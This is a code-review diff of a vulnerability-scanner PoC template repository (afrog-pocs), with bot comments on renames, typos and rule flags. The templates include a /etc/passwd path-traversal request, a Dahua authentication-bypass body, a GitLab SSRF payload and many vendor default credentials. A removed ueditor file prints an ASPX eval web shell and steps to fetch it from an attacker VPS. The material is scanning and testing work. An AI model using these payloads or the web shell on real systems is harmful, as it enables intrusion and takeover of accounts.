    5 5   author: pdteam
    6 6   severity: critical
    7 7   description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.
    8  - remediation: "Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0."
    9 8   reference:
    10 9   - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
    11 10   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369
    12  - metadata:
    13  - shodan-query: http.component:"Dynamicweb"
    14  - tags: cve,cve2022,dynamicweb,rce,unauth
    15  - classification:
    16  - cve-id: CVE-2022-25369
    17  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    18  - cvss-score: 9.8
    19  - cwe-id: CWE-425
    20 11   
    21  -transport: http
    22 12  rules:
    23 13   r0:
    24 14   request:
    skipped 5 lines
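Review bot: The `remediation` line removed at old line 8 was the only place this PoC recorded the fixed Dynamicweb versions, and the new `info` block keeps no equivalent, so a hit no longer tells the operator what to upgrade to. If `remediation` is not a key afrog's schema accepts, the text can be folded into the existing description, e.g. `description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. Fixed in Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8 and 9.13.0.`. The other sections in this commit that drop `classification` blocks lose only CVSS/CWE metadata, which the CVE reference still covers; this is the only one in view that drops fix information.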
  • afrog-pocs/cve/2022/CVE-2022-25568.yaml afrog-pocs/CVE/2022/CVE-2022-25568.yaml
    Content is identical
    afrog-pocs/cnvd/2017/ueditor-cnvd-2017-20077-file-upload.yaml
    1  -id: ueditor-cnvd-2017-20077-file-upload
    2  - 
    3  -info:
    4  - name: ueditor-cnvd-2017-20077-file-upload
    5  - author: zan8in
    6  - severity: critical
    7  - description: |
    8  - <form action="http://8.8.8.8:8001/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
    9  - <p>shell addr: <input type="text" name="source[]" style="width:600px"/></p>
    10  - <input type="submit" value="Submit" />
    11  - </form>
    12  - http://vps/11.jpg?.aspx 11.jpg是图片马;制作图片马:copy 1.jpg/b +2.aspx 3.aspx
    13  - aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["zan8in"],"unsafe");%>
    14  - reference:
    15  - - https://zhuanlan.zhihu.com/p/85265552
    16  - - https://www.freebuf.com/vuls/181814.html
    17  - tags: ueditor,cnvd,file-upload
    18  - 
    19  -manual: true
    20  -transport: http
    21  -rules:
    22  - r0:
    23  - request:
    24  - cache: true
    25  - method: GET
    26  - path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8
    27  - headers:
    28  - Accept-Encoding: 'deflate'
    29  - follow_redirects: false
    30  - expression: |
    31  - response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源")))
    32  -expression: r0()
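--- a/afrog-pocs/cve/2018/uwsgi-cve-2018-7490.yml
+++ b/afrog-pocs/cve/2018/uwsgi-cve-2018-7490.yml
@@ -1,30 +0,0 @@
-id: uwsgi-cve-2018-7490
- 
-info:
- name: uWSGI PHP Plugin Directory Traversal
- author: madrobot
- severity: high
- tags: cve,cve2018,uwsgi,php,lfi,plugin
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
- cve-id: CVE-2018-7490
- cwe-id: CWE-22
- description: "uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal."
- reference:
- - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
- - https://www.exploit-db.com/exploits/44223/
- - https://www.debian.org/security/2018/dsa-4142
- 
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
- follow_redirects: false
- expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-expression: r0()
- 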
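--- a/afrog-pocs/cve/2019/jira-cve-2019-8442.yml
+++ b/afrog-pocs/cve/2019/jira-cve-2019-8442.yml
@@ -1,17 +0,0 @@
-id: jira-cve-2019-8442
- 
-info:
- name: jira-cve-2019-8442
- author: pa55w0rd(www.pa55w0rd.online/)
- severity: high
- 
-transport: http
-rules:
- r0:
- request:
- method: GET
- path: /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- expression: response.status == 200 && response.body.bcontains(bytes(string(b"<groupId>com.atlassian.jira</groupId>"))) && response.content_type.contains("application/xml")
-expression: r0()
- 
- 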
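--- a/afrog-pocs/cve/2021/--CVE-2021-33044.yaml
+++ b/afrog-pocs/cve/2021/--CVE-2021-33044.yaml
@@ -1,41 +0,0 @@
-id: CVE-2021-33044
- 
-info:
- name: Dahua IPC/VTH/VTO devices Authentication Bypass
- author: gy741
- severity: critical
- description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
- reference:
- - https://github.com/dorkerdevil/CVE-2021-33044
- - https://nvd.nist.gov/vuln/detail/CVE-2021-33044
- - https://seclists.org/fulldisclosure/2021/Oct/13
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
- cve-id: CVE-2021-33044
- cwe-id: CWE-287
- tags: dahua,cve,cve2021,auth-bypass
- 
-transport: http
-set:
- hosturl: request.url
- hostname: request.url.host
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /api/v4/ci/lint
- headers:
- Host: "{{hostname}}"
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Accept: application/json, text/javascript, */*; q=0.01
- X-Requested-With: XMLHttpRequest
- Connection: close
- Origin: "{{hosturl}}"
- Referer: "{{hosturl}}"
- body: |
- {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
- expression: response.status == 200 && response.body.bcontains(b'"result":true') && response.body.bcontains(b'id') && response.body.bcontains(b'params') && response.body.bcontains(b'session')
-expression: r0()
- 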
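--- a/afrog-pocs/cve/2021/CVE-2021-22214.yml
+++ b/afrog-pocs/cve/2021/CVE-2021-22214.yml
@@ -1,25 +0,0 @@
-id: CVE-2021-22214
- 
-info:
- name: gitlab-ssrf-cve-2021-22214
- author: mumu0215(https://github.com/mumu0215)
- severity: high
- reference:
- - https://mp.weixin.qq.com/s/HFug1khyfHmCujhc_Gm_yQ
- 
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /api/v4/ci/lint
- headers:
- Content-Type: application/json
- body: |
- {"include_merged_yaml": true, "content": "include:\n remote: http://baidu.com/api/v1/targets/?test.yml"}
- expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"{\"status\":\"invalid\",\"errors\":") && (response.body.bcontains(b"does not have valid YAML syntax") || response.body.bcontains(b"could not be fetched"))
-expression: r0()
- 
- 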
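--- a/afrog-pocs/login/default-pwd/activemq-default-password.yml
+++ b/afrog-pocs/default-pwd/activemq-default-password.yaml
@@ -1,36 +1,35 @@
 id: activemq-default-password
  
 info:
- name: activemq-default-password
+ name: ActiveMQ Default Password
  author: pa55w0rd(www.pa55w0rd.online/)
  severity: high
+ 
 set:
  admin: "base64('admin:admin')"
  user: "base64('user:user')"
-manual: true
-transport: http
 rules:
- r11:
+ r0:
  request:
- todo: TODO_FAILURE_NOT_CONTINUE
  method: GET
  path: /
  expression: response.status == 200 && response.body.bcontains(b"<h2>Welcome to the Apache ActiveMQ!</h2>") && response.body.bcontains(b"<title>Apache ActiveMQ</title>")
- r0:
+ stop_if_mismatch: true
+ r1:
  request:
- todo: TODO_SUCCESS_NOT_CONTINUE
  method: GET
  path: /admin/
  headers:
  Authorization: Basic {{admin}}
  expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
- r1:
+ stop_if_match: true
+ r2:
  request:
- todo: TODO_SUCCESS_NOT_CONTINUE
  method: GET
  path: /admin/
  headers:
  Authorization: Basic {{user}}
  expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
-expression: r11() && (r0() || r1())
+ stop_if_match: true
+expression: r0() && (r1() || r2())
  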
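Review bot: `stop_if_match: true` on the final rule `r2` (new line 33) is a no-op, since there is no later rule left to skip; the same redundant flag is added to the last rule of jenkins-default-pwd.yaml (new line 33). Dropping it from the last rule keeps the flag's meaning clear as "skip the remaining credential attempts", which is exactly what it does on `r1` (new line 25). The `r11`/`r0`/`r1` → `r0`/`r1`/`r2` rename is carried through to `expression: r0() && (r1() || r2())`, so the rule references themselves are consistent.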
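--- a/afrog-pocs/login/default-pwd/alibaba-canal-default-password.yml
+++ b/afrog-pocs/default-pwd/alibaba-canal-default-password.yaml
@@ -1,23 +1,19 @@
 id: alibaba-canal-default-password
  
 info:
- name: alibaba-canal-default-password
+ name: Alibaba Canal Default Password
  author: jweny(https://github.com/jweny)
  severity: high
  description: fofa title="Canal Admin"
  
-manual: true
-transport: http
 rules:
  r1:
  request:
- cache: true
  method: POST
  path: /api/v1/user/login
  headers:
  Content-Type: application/json
  body: '{"username":"admin","password":"123456"}'
- follow_redirects: false
  expression: response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
 expression: r1()
  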
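Review bot: The only rule in this file is still named `r1` with no `r0` (new line 10 and `expression: r1()` on new line 18), which breaks the `r0`-first naming the rest of this commit normalizes (ActiveMQ's `r11` was renamed to `r0`). Renaming it to `r0:` and `expression: r0()` keeps the default-pwd files uniform now that they are being moved into one directory. The `description: fofa title="Canal Admin"` line is a search query rather than a description of the weakness; a short sentence such as `description: Canal Admin accepts the default credentials admin/123456 on /api/v1/user/login.` would read better, with the fofa query kept as a `fofa-query` entry like dubbo-admin-default-password.yaml does.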
    afrog-pocs/login/default-pwd/apache-ambari-default-password.yml afrog-pocs/default-pwd/ambari-default-password.yaml
    1  -id: apache-ambari-default-password
     1 +id: ambari-default-password
    2 2   
    3 3  info:
    4  - name: apache-ambari-default-password
     4 + name: Apache Ambari Default Password
    5 5   author: wulalalaaa(https://github.com/wulalalaaa)
    6 6   severity: high
    7 7   description: |
    8 8   fofa app="APACHE-Ambari" admin/admin
    9 9   
    10  -manual: true
    11  -transport: http
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
    18 15   headers:
    skipped 4 lines
  • afrog-pocs/login/default-pwd/chinaunicom-default-login.yaml afrog-pocs/default-pwd/chinaunicom-default-login.yaml
    Content is identical
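--- a/afrog-pocs/unreviewed/chinaunicom-modem-default-password.yml
+++ b/afrog-pocs/default-pwd/chinaunicom-modem-default-password.yaml
@@ -1,20 +1,16 @@
 id: chinaunicom-modem-default-password
  
 info:
- name: chinaunicom-modem-default-password
- author:
+ name: Chinaunicom Modem Default Password
+ author: unkown
  severity: high
  
-manual: true
-transport: http
 rules:
  r0:
  request:
- cache: true
  method: POST
  path: /cu.html
  body: frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
- follow_redirects: false
  expression: response.status == 302 && response.headers["location"] == "/menu.gch"
 expression: r0()
  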
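Review bot: `author: unkown` on new line 5 is misspelled and should be `author: unknown`; the same typo is introduced in nps-default-password.yaml (new line 5). Separately, this rule's expression asserts `response.status == 302 && response.headers["location"] == "/menu.gch"` while the commit removes `follow_redirects: false` from the request (old line 17); if the engine follows redirects by default when the key is absent, the matcher would only ever see the post-redirect response and could never observe the 302, turning this PoC into a permanent miss. Keeping `follow_redirects: false` on any rule that asserts a 3xx status (here, and the two `j_spring_security_check` rules in jenkins-default-pwd.yaml, which also key on `response.status == 302`) avoids depending on the engine default, which cannot be confirmed from the hunk.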
    afrog-pocs/login/default-pwd/datang-ac-default-password-cnvd-2021-04128.yml afrog-pocs/default-pwd/datang-ac-default-password-cnvd-2021-04128.yaml
    1  -id: datang-ac-default-password-cnvd-2021-04128
     1 +id: datang-ac-default-password-CNVD-2021-04128
    2 2   
    3 3  info:
    4  - name: datang-ac-default-password-cnvd-2021-04128
     4 + name: datang-ac-default-password-CNVD-2021-04128
    5 5   author: B1anda0(https://github.com/B1anda0)
    6 6   severity: high
    7 7   
    skipped 14 lines
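Review bot: `name` on new line 4 is changed only to repeat the new id slug (`datang-ac-default-password-CNVD-2021-04128`), whereas every other default-pwd file in this commit gets a human-readable title (`Alibaba Canal Default Password`, `Nexus Default Password`). A title such as `name: Datang AC Default Password (CNVD-2021-04128)` keeps the advisory number visible in reports without duplicating the id. The rest of the file is outside the hunk, so whether any other field was meant to carry the CNVD reference cannot be checked here.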
    afrog-pocs/login/default-pwd/dubbo-admin-default-password.yml afrog-pocs/default-pwd/dubbo-admin-default-password.yaml
    1 1  id: dubbo-admin-default-password
    2 2   
    3 3  info:
    4  - name: dubbo-admin-default-password
     4 + name: Dubbo Admin Default Password
    5 5   author: mumu0215(https://github.com/mumu0215)
    6 6   severity: high
    7 7   description: |
    8 8   fofa-query: app="APACHE-dubbo"
    9 9   
    10  -transport: http
    11 10  rules:
    12 11   guest0:
    13 12   request:
    skipped 14 lines
    afrog-pocs/login/default-pwd/gitlab-weak-login.yml afrog-pocs/default-pwd/gitlab-weak-login.yaml
    skipped 4 lines
    5 5   author: Suman_Kar,dwisiswant0
    6 6   severity: high
    7 7   description: Gitlab default login credentials were discovered.
    8  - tags: gitlab,default-login
    9 8   reference:
    10 9   - https://twitter.com/0xmahmoudJo0/status/1467394090685943809
    11 10   - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab
    12  - metadata:
    13  - shodan-query: http.title:"GitLab"
    14  - classification:
    15  - cwe-id: CWE-798
    16 11   
    17 12  set:
    18 13   hostname: request.url.host
    19 14   hosturl: request.url
    20  - 
    21  -manual: true
    22  -transport: http
    23 15  rules:
    24 16   r0:
    25 17   request:
    26  - cache: true
    27 18   method: POST
    28 19   path: /oauth/token
    29 20   headers:
    skipped 3 lines
    33 24   content-type: application/json
    34 25   body: |
    35 26   {"grant_type":"password","username":"root","password":"5iveL!fe"}
    36  - follow_redirects: false
    37 27   expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
    38 28   r1:
    39 29   request:
    40  - cache: true
    41 30   method: POST
    42 31   path: /oauth/token
    43 32   headers:
    skipped 3 lines
    47 36   content-type: application/json
    48 37   body: |
    49 38   {"grant_type":"password","username":"root","password":"123456789"}
    50  - follow_redirects: false
    51 39   expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
    52 40   r2:
    53 41   request:
    54  - cache: true
    55 42   method: POST
    56 43   path: /oauth/token
    57 44   headers:
    skipped 3 lines
    61 48   content-type: application/json
    62 49   body: |
    63 50   {"grant_type":"password","username":"admin","password":"5iveL!fe"}
    64  - follow_redirects: false
    65 51   expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
    66 52   r3:
    67 53   request:
    68  - cache: true
    69 54   method: POST
    70 55   path: /oauth/token
    71 56   headers:
    skipped 3 lines
    75 60   content-type: application/json
    76 61   body: |
    77 62   {"grant_type":"password","username":"admin","password":"123456789"}
    78  - follow_redirects: false
    79 63   expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
    80 64   r4:
    81 65   request:
    82  - cache: true
    83 66   method: POST
    84 67   path: /oauth/token
    85 68   headers:
    skipped 3 lines
    89 72   content-type: application/json
    90 73   body: |
    91 74   {"grant_type":"password","username":"[email protected]","password":"5iveL!fe"}
    92  - follow_redirects: false
    93 75   expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
    94 76   r5:
    95 77   request:
    96  - cache: true
    97 78   method: POST
    98 79   path: /oauth/token
    99 80   headers:
    skipped 3 lines
    103 84   content-type: application/json
    104 85   body: |
    105 86   {"grant_type":"password","username":"[email protected]","password":"123456789"}
    106  - follow_redirects: false
    107 87   expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
    108 88  expression: r0() || r1() || r2() || r3() || r4() || r5()
    109 89   
    skipped 1 lines
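Review bot: All six rules send a credential POST to `/oauth/token` and the final `expression: r0() || r1() || r2() || r3() || r4() || r5()` accepts any one of them, yet none of the rules carries `stop_if_match: true`, so after one login succeeds the remaining attempts are still sent to the host. Adding `stop_if_match: true` after each rule's expression (new lines 27, 39, 51, 63, 75) follows the pattern this commit introduces in activemq-default-password.yaml and avoids up to five redundant authentication attempts, which also reduces account-lockout noise on the target. The same applies to the two `Web.Login`/`web.Login` rules in minio-default-password.yaml (`expression: poc10() || poc20()`). Whether the engine already short-circuits on `||` cannot be told from the hunk, so this is worth confirming against the rule runner.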
    afrog-pocs/login/default-pwd/grafana-default-password.yml afrog-pocs/default-pwd/grafana-default-password.yaml
    1 1  id: grafana-default-password
    2 2   
    3 3  info:
    4  - name: grafana-default-password
     4 + name: Grafana Default Password
    5 5   author: For3stCo1d (https://github.com/For3stCo1d)
    6 6   severity: high
    7 7   
    8  -transport: http
    9 8  rules:
    10 9   r0:
    11 10   request:
    skipped 17 lines
    afrog-pocs/login/default-pwd/hikvision-intercom-service-default-password.yml afrog-pocs/default-pwd/hikvision-intercom-service-default-password.yaml
    1 1  id: hikvision-intercom-service-default-password
    2 2   
    3 3  info:
    4  - name: hikvision-intercom-service-default-password
     4 + name: Hikvision Intercom Service Default Password
    5 5   author: xueba(user/pass=admin/12345)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /
    16 13   expression: response.status == 200 && response.body.bcontains(bytes("document.title = LOGIN_BTN_LOGIN"))
    17 14   r1:
    18 15   request:
    19  - cache: true
    20 16   method: POST
    21 17   path: /authorize.action
    22 18   body: |
    23 19   username=admin&userpsw=827ccb0eea8a706c4c34a16891f84e7b&language=zh_cn
    24  - follow_redirects: false
    25 20   expression: 'response.status == 200 && response.body.bcontains(b"{\"success\": true, \"msg\": \"OK\"}")'
    26 21  expression: r0() && r1()
    27 22   
    skipped 1 lines
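Review bot: Rule `r0` (new lines 9–13) is a fingerprint check on `/` and the final expression is `r0() && r1()`, but unlike the ActiveMQ and Jenkins files in this commit it gets no `stop_if_mismatch: true`; if the engine evaluates rules in order without that flag, the credential POST in `r1` is still sent to every host, including those `r0` has already ruled out. Adding `stop_if_mismatch: true` directly after r0's expression (new line 13) matches the gating pattern introduced elsewhere in this commit and limits login attempts to hosts that actually present the Hikvision login page.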
    afrog-pocs/login/default-pwd/jenkins-default-pwd.yaml afrog-pocs/default-pwd/jenkins-default-pwd.yaml
    skipped 3 lines
    4 4   name: Jenkins Default Password
    5 5   author: zan8in
    6 6   severity: high
    7  - tags: jenkins,default-login
    8 7   
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - todo: TODO_FAILURE_NOT_CONTINUE
    14 11   method: GET
    15 12   path: /login
    16 13   expression: |
    17 14   response.status == 200 && response.body.bcontains(b'Sign in [Jenkins]')
     15 + stop_if_mismatch: true
    18 16   r1:
    19 17   request:
    20  - todo: TODO_SUCCESS_NOT_CONTINUE
    21 18   method: POST
    22 19   path: /j_spring_security_check
    23 20   body: |
    24 21   j_username=admin&j_password=admin&from=&Submit=Sign+in
    25 22   expression: |
    26 23   response.status == 302 && !response.headers["location"].contains("loginError")
     24 + stop_if_match: true
    27 25   r2:
    28 26   request:
    29  - todo: TODO_SUCCESS_NOT_CONTINUE
    30 27   method: POST
    31 28   path: /j_spring_security_check
    32 29   body: |
    33 30   j_username=jenkins&j_password=password&from=&Submit=Sign+in
    34 31   expression: |
    35 32   response.status == 302 && !response.headers["location"].contains("loginError")
     33 + stop_if_match: true
    36 34  expression: |
    37 35   r0() && (r1() || r2())
    38 36   
    afrog-pocs/unreviewed/jinher-oa-c6-default-password.yml afrog-pocs/default-pwd/jinher-oa-c6-default-password.yaml
    1 1  id: jinher-oa-c6-default-password
    2 2   
    3 3  info:
    4  - name: jinher-oa-c6-default-password
     4 + name: Jinher OA C6 Default Password
    5 5   author: iak3ec(https://github.com/nu0l)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   jiner:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /c6/Jhsoft.Web.login/AjaxForLogin.aspx
    16 13   body:
    skipped 5 lines
    afrog-pocs/unreviewed/kingsoft-v8-default-password.yml afrog-pocs/default-pwd/kingsoft-v8-default-password.yaml
    1 1  id: kingsoft-v8-default-password
    2 2   
    3 3  info:
    4  - name: kingsoft-v8-default-password
     4 + name: Kingsoft V8 Default Password
    5 5   author: B1anda0(https://github.com/B1anda0)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /inter/ajax.php?cmd=get_user_login_cmd
    16 13   body: '{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}'
    skipped 5 lines
    afrog-pocs/login/default-pwd/minio-default-password.yml afrog-pocs/default-pwd/minio-default-password.yaml
    1 1  id: minio-default-password
    2 2   
    3 3  info:
    4  - name: minio-default-password
     4 + name: Minio Default Password
    5 5   author: harris2015
    6 6   severity: high
    7 7   reference:
    8 8   - https://docs.min.io/cn/
    9 9   
    10  -manual: true
    11  -transport: http
    12 10  rules:
    13 11   poc10:
    14 12   request:
    skipped 2 lines
    17 15   headers:
    18 16   Content-Type: application/json
    19 17   body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
    20  - follow_redirects: false
    21 18   expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uiVersion") && response.body.bcontains(b"token")
    22 19   poc20:
    23 20   request:
    skipped 2 lines
    26 23   headers:
    27 24   Content-Type: application/json
    28 25   body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
    29  - follow_redirects: false
    30 26   expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uiVersion") && response.body.bcontains(b"token")
    31 27  expression: poc10() || poc20()
    32 28   
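Review bot: The rule names `poc10` and `poc20` (new lines 11 and 19) survive the move into the common default-pwd directory while the commit renames rules to `r0`/`r1` elsewhere (activemq-default-password.yaml); renaming them to `r0:`/`r1:` with `expression: r0() || r1()` keeps the directory consistent. The two rules differ only in the `Web.Login` vs `web.Login` method name in the JSON-RPC body, so a one-line comment above the second rule noting that it exists for the lower-case method variant would save the next maintainer from treating it as a duplicate.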
    afrog-pocs/unreviewed/netentsec-icg-default-password.yml afrog-pocs/default-pwd/netentsec-icg-default-password.yaml
    1 1  id: netentsec-icg-default-password
    2 2   
    3 3  info:
    4  - name: netentsec-icg-default-password
     4 + name: Netentsec Icg Default Password
    5 5   author: B1anda0(https://github.com/B1anda0)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /user/login/checkPermit
    16 13   body: usrname=ns25000&pass=ns25000
    skipped 4 lines
    afrog-pocs/unreviewed/nexus-default-password.yml afrog-pocs/default-pwd/nexus-default-password.yaml
    1 1  id: nexus-default-password
    2 2   
    3 3  info:
    4  - name: nexus-default-password
     4 + name: Nexus Default Password
    5 5   author: Soveless(https://github.com/Soveless)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /service/local/authentication/login
    16 13   headers:
    17 14   Accept: application/json
    18 15   Authorization: Basic YWRtaW46YWRtaW4xMjM=
    19  - follow_redirects: false
    20 16   expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"loggedIn")
    21 17  expression: r0()
    22 18   
    skipped 1 lines
    afrog-pocs/unreviewed/nps-default-password.yml afrog-pocs/default-pwd/nps-default-password.yaml
    1 1  id: nps-default-password
    2 2   
    3 3  info:
    4  - name: nps-default-password
    5  - author:
     4 + name: Nps Default Password
     5 + author: unkown
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /login/verify
    16 13   body: username=admin&password=123
    skipped 4 lines
    afrog-pocs/login/default-pwd/openerp-default-password.yml afrog-pocs/default-pwd/openerp-default-password.yaml
    1 1  id: openerp-default-password
    2 2   
    3 3  info:
    4  - name: openerp-default-password
     4 + name: Openerp Default Password
    5 5   author: zan8in
    6 6   severity: high
    7 7   
    8 8  set:
    9 9   hosturl: request.url
    10 10   r1: md5(randomLowercase(6))
    11  -manual: true
    12  -transport: http
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /web/session/authenticate
    19 16   headers:
    skipped 13 lines
    afrog-pocs/unreviewed/panabit-gateway-default-password.yml afrog-pocs/default-pwd/panabit-gateway-default-password.yaml
    1 1  id: panabit-gateway-default-password
    2 2   
    3 3  info:
    4  - name: panabit-gateway-default-password
     4 + name: Panabit Gateway Default Password
    5 5   author: Print1n(https://github.com/Print1n)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /login/userverify.cgi
    16 13   body: username=admin&password=panabit
    skipped 4 lines
    afrog-pocs/unreviewed/panabit-ixcache-default-password.yml afrog-pocs/default-pwd/panabit-ixcache-default-password.yaml
    1 1  id: panabit-ixcache-default-password
    2 2   
    3 3  info:
    4  - name: panabit-ixcache-default-password
     4 + name: Panabit Ixcache Default Password
    5 5   author: B1anda0(https://github.com/B1anda0)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /login/userverify.cgi
    16 13   body: username=admin&password=ixcache
    skipped 4 lines